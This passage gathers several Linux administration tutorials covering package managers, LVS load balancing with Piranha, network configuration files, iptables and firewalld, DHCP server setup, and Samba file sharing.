For upgrading your system: yum update

For installing new software pkg: yum install pkg (from package repository)

For installing new software pkg: yum localinstall pkg (from package file)

For updating existing software pkg: yum update pkg

For removing unwanted software pkg: yum erase pkg

For listing installed packages: rpm -qa

For searching by file name: yum provides file

For searching by pattern: yum search pattern

For searching by package name pkg: yum list pkg

For listing repositories: yum repolist

For adding a repository: (add repo to /etc/yum.repos.d/)

For removing a repository: (remove repo from /etc/yum.repos.d/)

 

You may be a Mandriva or Mageia user, in which case, the commands you will use will be:

For updating your package list: urpmi.update -a

For upgrading your system: urpmi --auto-select

For installing new software pkg: urpmi pkg (from package repository)

For installing new software pkg: urpmi pkg (from package file)

For updating existing software pkg: urpmi pkg

For removing unwanted software pkg: urpme pkg

For listing installed packages: rpm -qa

For searching by file name: urpmf file

For searching by pattern: urpmq --fuzzy pattern

For searching by package name pkg: urpmq pkg

For listing repositories: urpmq --list-media

For adding a repository: urpmi.addmedia name path

For removing a repository: urpmi.removemedia media

DEB - Debian Package Manager

Debian Package Manager was introduced by Debian and later adopted by all derivatives of Debian - Ubuntu, Mint, Knoppix, etc. This is a relatively simple and standardized set of tools, working across all the Debian derivatives. Therefore, if you use any of the distributions managed by the DEB package manager, you will be using the following commands:

For updating your package list: apt-get update

For upgrading your system: apt-get upgrade

For installing new software pkg: apt-get install pkg (from package repository)

For installing new software pkg: dpkg -i pkg (from package file)

For updating existing software pkg: apt-get install pkg

For removing unwanted software pkg: apt-get remove pkg

For listing installed package: dpkg -l

For searching by file name: apt-file search path

For searching by pattern: apt-cache search pattern

For searching by package name pkg: apt-cache search pkg

For listing repositories: cat /etc/apt/sources.list

For adding a repository: (edit /etc/apt/sources.list)

For removing a repository: (edit /etc/apt/sources.list)


Implementing Virtual Servers and Load Balancing Cluster System with Linux

What is Server Virtualization?

Server virtualization is the process of apportioning a physical server into several smaller virtual servers. During server virtualization, the resources of the server itself remain hidden. In fact, the resources are masked from users, and software is used for dividing the physical server into multiple virtual machines or environments, called virtual or private servers.

This technology is commonly used in Web servers. Virtual Web servers provide a very simple and popular way of offering low-cost web hosting services. Instead of using a separate computer for each server, dozens of virtual servers can co-exist on the same computer.

There are many benefits of server virtualization. For example, it allows each virtual server to run its own operating system. Each virtual server can be independently rebooted without disturbing the others. Because several servers run on the same hardware, less hardware is required for server virtualization, which saves a lot of money for the business. Since the process utilizes resources to the fullest, it saves on operational costs. Using a lower number of physical servers also reduces hardware maintenance.

In most cases, the customer does not observe any performance deficit and each web site behaves as if it were being served by a dedicated server. However, because the resources of the computer are shared, if a large number of virtual servers reside on the same computer, or if one of the virtual servers starts to hog the resources, web pages will be delivered more slowly.

There are several ways of creating virtual servers, with the most common being virtual machines, operating system-level virtualization, and paravirtual machines.

How Are Virtual Servers Helpful

With the Internet exploding with information, it is playing an increasingly important role in our lives. Internet traffic is increasing dramatically and has been growing at an annual rate of nearly 100%. The workload on servers is increasing significantly at the same time, so that servers frequently become overloaded for short durations, especially on popular web sites.

To overcome the overloading problem of the servers, there are two solutions. You could have a single server solution, such as upgrading the server to a higher performance server. However, as requests increase, it will soon be overloaded, so that it has to be upgraded repeatedly. The upgrading process is complex and the cost is high.

The other is the multiple server solution, such as building a scalable network service system on a cluster of servers. As load increases, you can just add a new server or several new servers into the cluster to meet the increasing requests, and a virtual server running on commodity hardware offers the lowest cost-to-performance ratio. Therefore, for network services, the virtual server is a highly scalable and cost-effective way of building a server cluster system.

Virtual Servers with Linux

Highly available server solutions are done by clustering. Cluster computing involves three distinct branches, of which two are addressed by RHEL or Red Hat Enterprise Linux:

  • Load balancing clusters using Linux Virtual Servers as specialized routing machines to dispatch traffic to a pool of servers.

  • Highly available or HA Clustering with Red Hat Cluster Manager that uses multiple machines to add an extra level of reliability for a group of services.

Load Balancing Cluster System Using RHEL Virtual Servers

When you access a website or a database application, you do not know if you are accessing a single server or a group of servers. To you, the Linux Virtual Server or LVS cluster appears as a single server. In reality, there is a cluster of two or more servers behind a pair of redundant LVS routers. These routers distribute the client requests evenly throughout the cluster system.

Administrators use Red Hat Enterprise Linux and commodity hardware to address availability requirements, and to create consistent and continuous access to all hosted services.

In its simplest form, an LVS cluster consists of two layers. In the first layer are two similarly configured cluster members, which are Linux machines. One of these machines is the LVS router and is configured to direct the requests from the internet to the servers. The LVS router balances the load on the real servers, which form the second layer. The real servers provide the critical services to the end-user. The second Linux machine acts as a monitor to the active router and assumes its role in the event of a failure.

The active router directs traffic from the internet to the real servers by making use of Network Address Translation or NAT. The real servers are connected to a dedicated network segment and transfer all public traffic via the active LVS router. The outside world sees this entire cluster arrangement as a single entity.

LVS with NAT Routing

The active LVS router has two Network Interface Cards or NICs. One of the NICs is connected to the Internet and has a real IP address on the eth0 and a floating IP address aliased to eth0:1. The other NIC connects to the private network with a real IP address on the eth1, and a floating address aliased to eth1:1.

All the servers of the cluster are located on the private network and use the floating IP for the NAT router. They communicate with the active LVS router via the floating IP as their default route. This ensures their ability to respond to requests from the Internet is not impaired.

When requests are received by the active LVS router, it routes the request to an appropriate server. The real server processes the request and returns the packets to the LVS router. Using NAT, the LVS router then replaces the address of the real server in the packets with the public IP address of the LVS router. This process is called IP Masquerading, and it hides the IP addresses of the real servers from the requesting clients.

Configuring LVS Routers with the Piranha Configuration Tool

The configuration file for an LVS cluster follows strict formatting rules. To prevent server failures because of syntax errors in the file lvs.cf, using the Piranha Configuration Tool is highly recommended. This tool provides a structured approach to creating the necessary configuration file for a Piranha cluster. The configuration file is located at /etc/sysconfig/ha/lvs.cf, and the configuration is done through a web-based interface served by the Apache HTTP Server.

As an example, we will use the following settings:

LVS Router 1: eth0: 192.168.26.201

LVS Router 2: eth0: 192.168.26.202

Real Server 1: eth0: 192.168.26.211

Real Server 2: eth0: 192.168.26.212

VIP: 192.168.26.200

Gateway: 192.168.26.1

You will need to install piranha and ipvsadm packages on the LVS Routers:

# yum install ipvsadm

# yum install piranha

Start services on the LVS Routers with:

# chkconfig pulse on

# chkconfig piranha-gui on

# chkconfig httpd on

Set a Password for the Piranha Configuration Tool using the following commands: 

# piranha-passwd

Next, turn on Packet Forwarding on the LVS Routers with:

# echo 1 > /proc/sys/net/ipv4/ip_forward
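Note that echoing into /proc enables packet forwarding only until the next reboot. To make the setting persistent, add the following line to /etc/sysctl.conf and reload it:

net.ipv4.ip_forward = 1

# sysctl -p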

Starting the Piranha Configuration Tool Service

First you'll need to put SELinux into permissive mode using the command:

# setenforce 0

# service httpd start

# service piranha-gui start

If this is not done, the system will most probably show the following error message when the piranha-gui service is started:

Starting piranha-gui: (13)Permission denied: make_sock: could not bind to address [::]:3636

(13)Permission denied: make_sock: could not bind to address 0.0.0.0:3636
No listening sockets available, shutting down
Unable to open logs

Configure the LVS Routers with the Piranha Configuration Tool

The Piranha Configuration Tool runs on port 3636 by default. Open http://localhost:3636 or http://192.168.26.201:3636 in a web browser to access the Piranha Configuration Tool. Click on the Login button, enter piranha for the Username and the administrative password you created in the Password field:

linux-virtual-servers-1

Click on the GLOBAL SETTINGS panel, enter the primary server public IP, and click the ACCEPT button:

linux-virtual-servers-2

 Click on the REDUNDANCY panel, enter the redundant server public IP, and click the ACCEPT button:

linux-virtual-servers-3

 Click on the VIRTUAL SERVERS panel, add a server, edit it, and activate it:

linux-virtual-servers-4

linux-virtual-servers-5

Clicking on the REAL SERVER subsection link at the top of the panel displays the EDIT REAL SERVER subsection. Click the ADD button to add new servers, edit them and activate them:

linux-virtual-servers-6

Copy the lvs.cf file to another LVS router:

# scp /etc/sysconfig/ha/lvs.cf root@192.168.26.202:/etc/sysconfig/ha/lvs.cf

Start the pulse services on the LVS Routers with the following command:

# service pulse restart

Testing the System

You can use the Apache HTTP server benchmarking tool (ab) to simulate a visit by the user.
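For example, pointing ab at the cluster's virtual IP defined earlier and confirming the requests are answered is a quick smoke test (the request count and concurrency below are arbitrary example values):

# ab -n 1000 -c 10 http://192.168.26.200/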

HA Clustering With Red Hat Cluster Manager

When dealing with clusters, single points of failure and unresponsive applications and nodes are some of the issues that increase the non-availability of the servers. Red Hat addresses these issues through their High Availability or HA Add-On servers. Centralised configuration and management are some of the best features of the Conga application of RHEL.

For delivering an extremely mature, high-performing, secure and lightweight high-availability server solution, RHEL implements the Totem Single Ring Ordering and Membership Protocol. Corosync is the cluster executive within the HA Add-On.

Kernel-based Virtual Machine Technology

RHEL uses the Linux kernel that has the virtualization characteristics built-in and makes use of the kernel-based virtual machine technology known as KVM. This makes RHEL perfectly suitable to run as either a host or a guest in any Enterprise Linux deployment. As a result, all Red Hat Enterprise Linux system management and security tools and certifications are part of the kernel and always available to the administrators, out of the box.

RHEL uses highly improved SCSI-3 PR reservations-based fencing. Fencing is the process of cutting a cluster node off from shared resources when it has lost contact with the cluster. This prevents uncoordinated modification of shared storage, thus protecting the resources.

Improvement in system flexibility and configuration is possible because RHEL allows manual specification of devices and keys for reservation and registration. Ordinarily, after fencing, the disconnected cluster node would need to be rebooted to rejoin the cluster. RHEL unfencing makes it possible to re-enable access and start up the node without administrative intervention.

Improved Cluster Configuration

LDAP, the Lightweight Directory Access Protocol, provides an improved cluster configuration system for load options. This provides better manageability and usability across the cluster by easily configuring, validating and synchronizing configuration reloads. Virtualized KVM guests can be run as managed services.

RHEL's web interface for cluster management and administration runs on TurboGears2 and provides a rich graphical user interface. This enables unified logging and debugging: administrators can enable, capture and read cluster system logs using a single cluster configuration command.

Installing TurboGears2

The method of installing TurboGears2 depends on the platform and the level of experience. It is recommended to install TurboGears2 within a virtual environment as this will prevent interference with the system's installed packages. Prerequisites for the installation of TurboGears2 are Python, Setuptools, a database and drivers, Virtualenv, Virtualenvwrapper and other dependencies.

linux-virtual-servers-7


Working with Linux TCP/IP Network Configuration Files

This article covers the main TCP/IP network configuration files used by Linux to configure various network services of the system, such as the IP address, default gateway, name servers (DNS), hostname and much more. Any Linux administrator must be well aware of where these services are configured and how to use them. The good news is that most of the information provided in this article applies to RedHat Fedora, Enterprise Linux, CentOS, Ubuntu and other similar Linux distributions.

On most Linux systems, you can access the TCP/IP connection details within 'X Windows' from Applications > Others > Network Connections. The same may also be reached through Application > System Settings > Network > Configure. This opens up a window, which offers configuration of IP parameters for wired, wireless, mobile broadband, VPN and DSL connections:

linux-tcpip-config-1

The values entered here modify the files:

           /etc/sysconfig/network-scripts/ifcfg-eth0

           /etc/sysconfig/networking/devices/ifcfg-eth0

           /etc/resolv.conf

           /etc/hosts

The static host IP assignment is saved in /etc/hosts

The DNS server assignments are saved in the /etc/resolv.conf

IP assignments for all the devices found on the system are saved in the ifcfg-<interface> files mentioned above.

If you want to see all the IP assignments, you can run the command for interface configuration:

# ifconfig

Following is the output of the above command:

[root@gateway ~]# ifconfig

eth0    Link encap:Ethernet  HWaddr 00:0C:29:AB:21:3E
          inet addr:192.168.1.18  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:feab:213e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1550249 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1401847 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:167592321 (159.8 MiB)  TX bytes:140584392 (134.0 MiB)
          Interrupt:19 Base address:0x2000

lo        Link encap:Local Loopback 
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:71833 errors:0 dropped:0 overruns:0 frame:0
          TX packets:71833 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:12205495 (11.6 MiB)  TX bytes:12205495 (11.6 MiB)

The command ifconfig is used to configure a network interface. It can be used to set up the interface parameters that are used at boot time. If no arguments are given, the command ifconfig displays the status of the currently active interfaces. If you want to see the status of all interfaces, including those that are currently down, you can use the argument -a, as shown below:

# ifconfig -a

Fedora, Redhat Enterprise Linux, CentOS and other similar distributions support user profiles as well, with different network settings for each user. The user profile and its parameters are set by the network-configuration tools. The relevant system files are placed in:

/etc/sysconfig/networking/profiles/profilename/

After boot-up, to switch to a specific profile you have to access a graphical tool, which will allow you to select from among the available profiles. You will have to run:

$ system-config-network

Or for activating the profile from the command line -

$ system-config-network-cmd -p <profilename> --activate

The Basic Commands for Networking

The basic commands used in Linux are common to every distro:

ifconfig - Configures and displays the IP parameters of a network interface

route - Used to set static routes and view the routing table

hostname - Necessary for viewing and setting the hostname of the system

netstat - Flexible command for viewing information about network statistics, current connections, listening ports

arp - Shows and manages the arp table

mii-tool - Used to set the interface parameters at data link layer (half/full duplex, interface speed, autonegotiation, etc.)

Many distros now include the iproute2 suite, with enhanced routing and networking tools:

ip - Multi-purpose command for viewing and setting TCP/IP parameters and routes.

tc - Traffic control command, used  for classifying, prioritizing, sharing, and limiting both inbound and outbound traffic.
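As an illustration, the ip command alone can replace several of the older tools; a few common invocations are shown below:

# ip addr show             (list interfaces and their IP addresses – replaces ifconfig)
# ip route show            (display the routing table – replaces route)
# ip link set eth0 up      (bring an interface up)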

Types of Network Interface

LO (local loopback interface): the loopback interface is recognized only internally by the computer; its IP address is usually 127.0.0.1 or 127.0.0.2.

Ethernet cards are used to connect to the world external to the computer, usually named eth0, eth1, eth2 and so on.

Network interface files holding the configuration of LO and ethernet are:

           /etc/sysconfig/network-scripts/ifcfg-lo

           /etc/sysconfig/network-scripts/ifcfg-eth0

To see the contents of the files use the command:

# less /etc/sysconfig/network-scripts/ifcfg-lo

Which results in:

DEVICE=lo
IPADDR=127.0.0.1
NETMASK=255.0.0.0
NETWORK=127.0.0.0
# If you're having problems with gated making 127.0.0.0/8 a martian,
# you can change this to something else (255.255.255.255, for example)
BROADCAST=127.255.255.255
ONBOOT=yes
NAME=loopback

And the following:

# less /etc/sysconfig/network-scripts/ifcfg-eth0

Which gives the following results:

DEVICE="eth0"
NM_CONTROLLED="yes"
ONBOOT=yes
HWADDR=00:0C:29:52:A3:DB
TYPE=Ethernet
BOOTPROTO=none
IPADDR=192.168.1.18
PREFIX=24
GATEWAY=192.168.1.11
DNS1=8.8.8.8
DEFROUTE=yes
IPV4_FAILURE_FATAL=yes
IPV6INIT=no
NAME="System eth0"
UUID=5fb06bd0-0bb0-7ffb-45f1-d6edd65f3e03

 

Start and Stop the Network Interface Card

The ifconfig command can be used to start and stop network interface cards:

# ifconfig eth0 up
# ifconfig eth0 down

The ifup & ifdown command can also be used to start and stop network interface cards:

# ifup eth0
# ifdown eth0

The systemctl commands can also be used to enable, start, stop, restart and check the status of the network interface services -

# systemctl enable network.service
# systemctl start network.service
# systemctl stop network.service
# systemctl restart network.service
# systemctl status network.service

Displaying & Changing your System's Hostname

The command hostname displays the current hostname of the computer, which is 'Gateway':

# hostname
Gateway

You can change the hostname by giving the new name at the end of the command -

# hostname Firewall-cx

The new hostname will appear once you have logged out and logged in again. In fact, for any change to the interfaces made this way, the change is reflected in your session only after the next login.
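Keep in mind that the hostname command only changes the running system. On the RedHat-family distributions covered here, the name is lost after a reboot unless it is also recorded in the network configuration file; a quick way to make it permanent is to edit /etc/sysconfig/network and set:

HOSTNAME=Firewall-cx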

This concludes our Linux Network Configuration article.




Configuring Linux to Act as a Firewall - Linux IPTables Basics

What exactly is a firewall? As in the non-computer world, a firewall acts as a physical barrier to prevent fires from spreading. In the computer world too, the firewall acts in a similar manner, only the fires it prevents from spreading are the attacks that crackers generate when the computer is on the Internet. Therefore, a firewall can also be called a packet filter, which sits between the computer and the Internet, controlling and regulating the information flow.

Most of the firewalls in use today are filtering firewalls. They sit between the computer and the Internet and limit access to only specific computers on the network. They can also be programmed to limit the type of communication, and to selectively permit or deny several Internet services.

Organizations receive their routable IP addresses from their ISPs. However, the number of IP addresses given is limited. Therefore, alternate ways of sharing the Internet services have to be found without every node on the LAN getting a public IP address. This is done commonly by using private IP addresses, so that all nodes are able to access properly both external and internal network services.

Firewalls are used for receiving incoming transmissions from the Internet and routing the packets to the intended nodes on the LAN. Similarly, firewalls are also used for routing outgoing requests from a node on the LAN to the remote Internet service.

This method of forwarding the network traffic may prove to be dangerous, when modern cracking tools can spoof the internal IP addresses and allow the remote attacker to act as a node on the LAN. In order to prevent this, the iptables provide routing and forwarding policies, which can be implemented for preventing abnormal usage of networking resources. For example, the FORWARD chain lets the administrator control where the packets are routed within a LAN.

LAN nodes can communicate with each other, and they can accept the forwarded packets from the  firewall, with their internal IP addresses. However, this does not give them the facility to communicate to the external world and to the Internet.

For allowing the LAN nodes that have private IP addresses to communicate with the outside world, the firewall has to be configured for IP masquerading. The requests that LAN nodes make, are then masked with the IP addresses of the firewall’s external device, such as eth0.

How IPtables Can Be Used To Configure Your Firewall

Whenever a packet arrives at the firewall, it is either processed or disregarded. The disregarded packets are normally those that are malformed or technically invalid in some way. The packets that are processed are handled by one of three built-in 'tables'. The first table is the mangle table, which alters the quality-of-service (TOS) bits in the packet header. The second table is the filter queue, which takes care of the actual filtering of the packets. It consists of three chains, and you can place your firewall policy rules in these chains (shown in the diagram below):

- Forward chain: It filters the packets to be forwarded to networks protected by the firewall.

- Input chain: It filters the packets arriving at the firewall.

- Output chain: It filters the packets leaving the firewall.

The third table is the NAT table. This is where the Network Address Translation or NAT is performed. There are two built-in chains in this:

- Pre-routing chain: It NATs the packets whose destination address needs to be changed.

- Post-routing chain: It NATs the packets whose source address needs to be changed.

Whenever a rule is set, the table it belongs to has to be specified. The 'filter' table is the only exception: because most iptables rules are filter rules, the filter table is the default table.
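
For example, you can list the rules currently loaded in each table; a minimal illustration (the -n option simply suppresses DNS lookups):

# iptables -L -n
# iptables -t nat -L -n
# iptables -t mangle -L -n

The first command lists the default filter table, while the other two name the nat and mangle tables explicitly with -t.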

The diagram below shows the flow of packets within the filter table. Packets entering the Linux system follow a specific logical path and decisions are made based on their characteristics. The path shown below is independent of the network interface they are entering or exiting:

The Filter Queue Table

linux-ip-filter-table

Each of the chains filters data packets based on:

  • Source and Destination IP Address
  • Source and Destination Port number
  • Network interface (eth0, eth1 etc)
  • State of the packet 

Each rule also specifies a target, which decides what happens to a matching packet: ACCEPT, DROP, REJECT, QUEUE, RETURN or LOG.
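
As an illustrative sketch combining these criteria, the first rule below accepts new SSH connections arriving on eth0 from the 192.168.1.0/24 network, and the second silently drops everything else arriving on eth0 (the addresses, interface and port are examples only):

# iptables -A INPUT -i eth0 -p tcp -s 192.168.1.0/24 --dport 22 -m state --state NEW -j ACCEPT
# iptables -A INPUT -i eth0 -j DROP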

As mentioned previously, the table of NAT rules consists mainly of two chains: each rule is examined in order until one matches. The two chains are called PREROUTING (for Destination NAT, as packets first come in), and POSTROUTING (for Source NAT, as packets leave).

The NAT Table

linux-nat-table

At each of the points above, when a packet passes we look up what connection it is associated with. If it's a new connection, we look up the corresponding chain in the NAT table to see what to do with it. The answer it gives will apply to all future packets on that connection.

The most important option here is the table selection option, `-t'. For all NAT operations, you will want to use `-t nat' for the NAT table. The second most important option to use is `-A' to append a new rule at the end of the chain (e.g. `-A POSTROUTING'), or `-I' to insert one at the beginning (e.g. `-I PREROUTING').

The following command enables NAT for all outgoing packets. Eth0 is our WAN interface:

# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

If you'd rather implement static NAT, mapping an internal host to a public IP, here's what the command would look like:

# iptables -A POSTROUTING -t nat -s 192.168.0.3 -o eth0 -d 0/0 -j SNAT --to 203.18.45.12

With the above command, all outgoing packets sent from internal IP 192.168.0.3 are mapped to external IP 203.18.45.12.

Taking it the other way around, the command below is used to enable port forwarding from the WAN interface, to an internal host. Any incoming packets on our external interface (eth0) with a destination port (dport) of 80, are forwarded to an internal host (192.168.0.5), port 80:

# iptables -t nat -A PREROUTING -p tcp -i eth0 --dport 80 -j DNAT --to 192.168.0.5:80

How The FORWARD Chain Allows Packet Forwarding

Packet forwarding within a LAN is controlled by the FORWARD chain in the iptables firewall. If the firewall is assigned an internal IP address eth2 and an external IP address on eth0,  the rules to be used to allow the forwarding to be done for the entire LAN would be:

# iptables -A FORWARD -i eth2 -j ACCEPT
# iptables -A FORWARD -o eth0 -j ACCEPT

This way, the firewall can forward traffic for the LAN nodes that have internal IP addresses: packets enter through the firewall's eth2 device and are then routed on towards their intended destination nodes.
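
Note that for any forwarding to take place at all, IP forwarding must also be enabled in the kernel. A quick sketch using the standard sysctl mechanism:

# sysctl -w net.ipv4.ip_forward=1

To make the setting persistent across reboots, add net.ipv4.ip_forward = 1 to the /etc/sysctl.conf file.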

Dynamic Firewall

By default, the IPv4 policy in Fedora kernels disables support for IP forwarding. This prevents machines that run Fedora from functioning as a dedicated firewall. Furthermore, starting with Fedora 16, the default firewall solution is now provided by “firewalld”. Although it is claimed to be the default, Fedora 16 still ships with the traditional firewall iptables. To enable the dynamic firewall in Fedora, you will need to disable the traditional firewall and install the new dynamic firewalld. The main difference between the two is firewalld is smarter in the sense it does not have to be stopped and restarted each time a policy decision is changed, unlike the traditional firewall.

To disable the traditional firewall, there are two methods: graphical and command line. For the graphical method, the system-config-firewall GUI can be opened from the Applications menu > Other > Firewall, and the firewall can be disabled from there.

For the command line, following commands will be needed:

# systemctl stop iptables.service
# systemctl stop ip6tables.service

To remove iptables entirely from system:

# systemctl disable iptables.service

rm '/etc/systemd/system/basic.target.wants/iptables.service'

# systemctl disable ip6tables.service

rm '/etc/systemd/system/basic.target.wants/ip6tables.service'

For installing Firewalld, you can use Yum:

# yum install firewalld firewall-applet

To enable and then start Firewalld you will need the following commands:

# systemctl enable firewalld.service
# systemctl start firewalld.service

The firewall-applet can be started from Applications menu > Other > Firewall Applet

When you hover the mouse over the firewall applet on the top panel, you can see the ports, services, etc. that are enabled. By clicking on the applet, the different services can be started or stopped. However, if you change the status and the applet crashes, then in order to regain control you will have to kill the applet using the following commands:

# ps -A | grep firewall

Which will tell you the PID of the running applet, and you can kill it with the following command:

# kill -9 <pid>

A restart of the applet can be done from the Applications menu, and now the service you had enabled will be visible.

To get around the applet altogether, the command-line tool can be used instead:

Use firewall-cmd to enable, for example ssh: 

# firewall-cmd --enable --service=ssh

Enable samba for 10 seconds:

# firewall-cmd --enable --service=samba --timeout=10

Enable ipp-client:

# firewall-cmd --enable --service=ipp-client

Disable ipp-client:

# firewall-cmd --disable --service=ipp-client

To restore the static firewall with lokkit again simply use (after stopping and disabling Firewalld):

# lokkit --enabled


Installation and Configuration of Linux DHCP Server

For a cable modem or a DSL connection, the service provider dynamically assigns the IP address to your PC. When you install a DSL or a home cable router between your home network and your modem, your PC will get its IP address from the home router during boot up. A Linux system can be set up as a DHCP server and used in place of the router.

The DHCP server is not installed by default on your Linux system. To install it, you first have to gain root privileges:

$ su -

You will be prompted for the root password and you can install DHCP by the command:

# yum install dhcp

Once all the dependencies are satisfied, the installation will complete.

Start the DHCP Server

You will need root privileges for enabling, starting, stopping or restarting the dhcpd service:

# systemctl enable dhcpd.service

Once enabled, the dhcpd services can be started, stopped and restarted with:

# systemctl start dhcpd.service
# systemctl stop dhcpd.service
# systemctl restart dhcpd.service

or with the use of the following commands if systemctl command is not available:

# service dhcpd start
# service dhcpd stop
# service dhcpd restart

To determine whether dhcpd is running on your system, you can seek its status:

# systemctl status dhcpd.service

Another way of knowing if dhcpd is running is to use the 'service' command:

# service dhcpd status

Note that dhcpd has to be enabled, as shown above, if it is to start automatically on the next reboot.

Configuring the Linux DHCP Server

Depending on the version of the Linux installation you are currently running, the dhcpd.conf configuration file may reside in the /etc/dhcp directory, in /etc/dhcp3 (older Debian-based systems), or directly under /etc as /etc/dhcpd.conf (older RedHat-based systems).

When you install the DHCP package, a skeleton configuration file and a sample configuration file are created. Both are quite extensive, and the skeleton configuration file has most of its commands deactivated with # at the beginning. The sample configuration file can be found in the location /usr/share/doc/dhcp*/dhcpd.conf.sample.

When the dhcpd.conf file is created, a subnet section should be present for each of the networks attached to your Linux system's interfaces; this is very important (an interface on which you will not serve addresses still needs an empty subnet declaration, as shown at the end of the example). Following is a small part of the dhcpd.conf file:

ddns-update-style interim;
ignore client-updates;

subnet 192.168.1.0 netmask 255.255.255.0 {

   # The range of IP addresses the server
   # will issue to DHCP enabled PC clients
   # booting up on the network
   range 192.168.1.201 192.168.1.220;

   # Set the amount of time in seconds that
   # a client may keep the IP address
   default-lease-time 86400;
   max-lease-time 86400;

   # Set the default gateway to be used by
   # the PC clients
   option routers 192.168.1.1;

   # Don't forward DHCP requests from this
   # NIC interface to any other NIC interfaces
   option ip-forwarding off;

   # Set the broadcast address and subnet mask
   # to be used by the DHCP clients
   option broadcast-address 192.168.1.255;
   option subnet-mask 255.255.255.0;

   # Set the NTP server to be used by the DHCP clients
   option ntp-servers 192.168.1.100;

   # Set the DNS server to be used by the DHCP clients
   option domain-name-servers 192.168.1.100;

   # If you specify a WINS server for your Windows clients,
   # you need to include the following option in the dhcpd.conf file:
   option netbios-name-servers 192.168.1.100;

   # You can also assign specific IP addresses based on the clients'
   # ethernet MAC address as follows (host's name is "laser-printer"):
   host laser-printer {
      hardware ethernet 08:00:2b:4c:59:23;
      fixed-address 192.168.1.222;
   }
}

#
# List an unused interface here
#
subnet 192.168.2.0 netmask 255.255.255.0 {
}

The IP addresses will need to be changed to meet the ranges suitable to your network. There are other option statements that can be used to configure the DHCP. As you can see, some of the resources such as printers, which need fixed IP addresses, are given the specific IP address based on the NIC MAC address of the device.

For more information, you may read the relevant man pages:

# man dhcp-options

Routing with a DHCP Server

When a PC configured for DHCP boots, it requests an IP address from the DHCP server. For this, it broadcasts a standard DHCP request packet to the destination address 255.255.255.255 (the client does not yet have a usable address of its own). A route has to be added for the 255.255.255.255 address so that the DHCP server knows on which interface it has to send the broadcast reply. This is done by adding the route information to the /etc/sysconfig/network-scripts/route-eth0 file, assuming the route is to be added to the eth0 interface:

#
# File /etc/sysconfig/network-scripts/route-eth0
#
255.255.255.255/32 dev eth0

After defining the interface for the DHCP routing, it has to be further ensured that your DHCP server listens only on that interface and no other. For this, the /etc/sysconfig/dhcpd file has to be edited and the preferred interface added to the DHCPDARGS variable. If the interface is to be eth0, the following changes need to be made:

# File: /etc/sysconfig/dhcpd

DHCPDARGS=eth0

Testing the DHCP

Using the netstat command with the -au option lists all UDP sockets; filtering the output through grep shows which interface is listening on the bootps (DHCP server) UDP port:

# netstat -au  | grep bootp

will result in the following:

udp     0         0 192.168.1.100:bootps         *:*

Additionally, a check on the /var/log/messages file will show the defined interfaces used from the time the dhcpd daemon was started:

Feb  24 17:22:44 Linux-64 dhcpd: Listening on LPF/eth0/00:e0:18:5c:d8:41/192.168.1.0/24
Feb  24 17:22:44 Linux-64 dhcpd: Sending on  LPF/eth0/00:e0:18:5c:d8:41/192.168.1.0/24

This confirms the DHCP service has been installed successfully and is operating correctly.
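
As a final end-to-end check, you can release and renew a lease from a Linux client on the same network, assuming the dhclient utility is installed on that client:

# dhclient -r eth0
# dhclient eth0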


Configuring Linux Samba (SMB) - How to Setup Samba (Linux Windows File Sharing)

Resource sharing, like file systems and printers, in Microsoft Windows systems, is accomplished using a protocol called the Server Message Block or SMB. For working with such shared resources over a network consisting of Windows systems, an RHEL system must support SMB. The technology used for this is called SAMBA. This provides integration between the Windows and Linux systems. In addition, this is used to provide folder sharing between Linux systems. There are two parts to SAMBA, a Samba Server and a Samba Client.

When an RHEL system accesses resources on a Windows system, it does so using the Samba Client. An RHEL system, by default, has the Samba Client installed.

When an RHEL system serves resources to a Windows system, it uses the package Samba Server or simply Samba. This is not installed by default and has to be exclusively set up.

Installing SAMBA on Linux Redhat/CentOS

Whether Samba is already installed on your RHEL, Fedora or CentOS setup can be tested with the following command:

$ rpm -q samba

The result could be - “package samba is not installed,” or something like “samba-3.5.4-68.el6_0.1.x86_64” showing the version of Samba present on the system.

To install Samba, you will need to become root with the following command (give the root password, when prompted):

$ su -       

Then use Yum to install the Linux Samba package:

# yum install samba

This will install the samba package and its dependency package, samba-common.

Before you begin to use or configure Samba, the Linux Firewall (iptables) has to be configured to allow Samba traffic. From the command-line, this is achieved with the use of the following command:

# firewall-cmd --enable --service=samba

Configuring Linux SAMBA

In this example, Samba will be configured to join an RHEL, Fedora or CentOS system to a Windows workgroup and to set up a directory on the RHEL system that acts as a shared resource accessible to authenticated Windows users.

To start with, you must gain root privileges with (give the root password, when prompted):

$ su -     

Edit the Samba configuration file:

# vi /etc/samba/smb.conf

The smb.conf [Global] Section

An smb.conf file is divided into several sections. The [global] section, which is the first section, has settings that apply to the entire Samba configuration. However, settings in the other sections of the configuration file may override the global settings.

To begin with, set the workgroup, which by default is set as “MYGROUP”:

workgroup = MYGROUP

Since most Windows networks are named WORKGROUP by default, the settings have to be changed as:

workgroup = workgroup

Configure the Shared Resource

In the next step, a shared resource that will be accessible from the other systems on the Windows network has to be configured. This section has to be given a name by which it will be referred to when shared. For our example, let’s assume you would like to share a directory on your Linux system located at /data/network-applications. You’ll need to entitle the entire section as [NetApps], as shown below in our smb.conf file:

[NetApps]       

path = /data/network-applications

writeable = yes

browseable = yes

valid users = administrator

When a Windows user browses to the Linux server, they’ll see a network share labeled "NetApps".

This concludes the changes to the Samba configuration file.

Create a Samba User

Any user wanting to access any Samba shared resource must be configured as a Samba User and assigned a password. This is achieved using the smbpasswd  command as a root user. Since you have defined “administrator” as the user who is entitled to access the “/data/network-applications” directory of the RHEL system, you have to add “administrator” as a Samba user.

You must gain root privileges with the following command (give the root password, when prompted):

$ su -

Add "administrator" as a Samba user:

# smbpasswd -a administrator

The system will respond with

New SMB password: <Enter password>
Retype new SMB password: <Retype password>

This will result in the following message:

Added user administrator

It will also be necessary to add the same account as a regular Linux user, using the same password we used for the Samba user:

# adduser administrator
# passwd administrator
Changing password for user administrator
New UNIX password: ********
Retype new UNIX password: ********
passwd: all authentication tokens updated successfully.

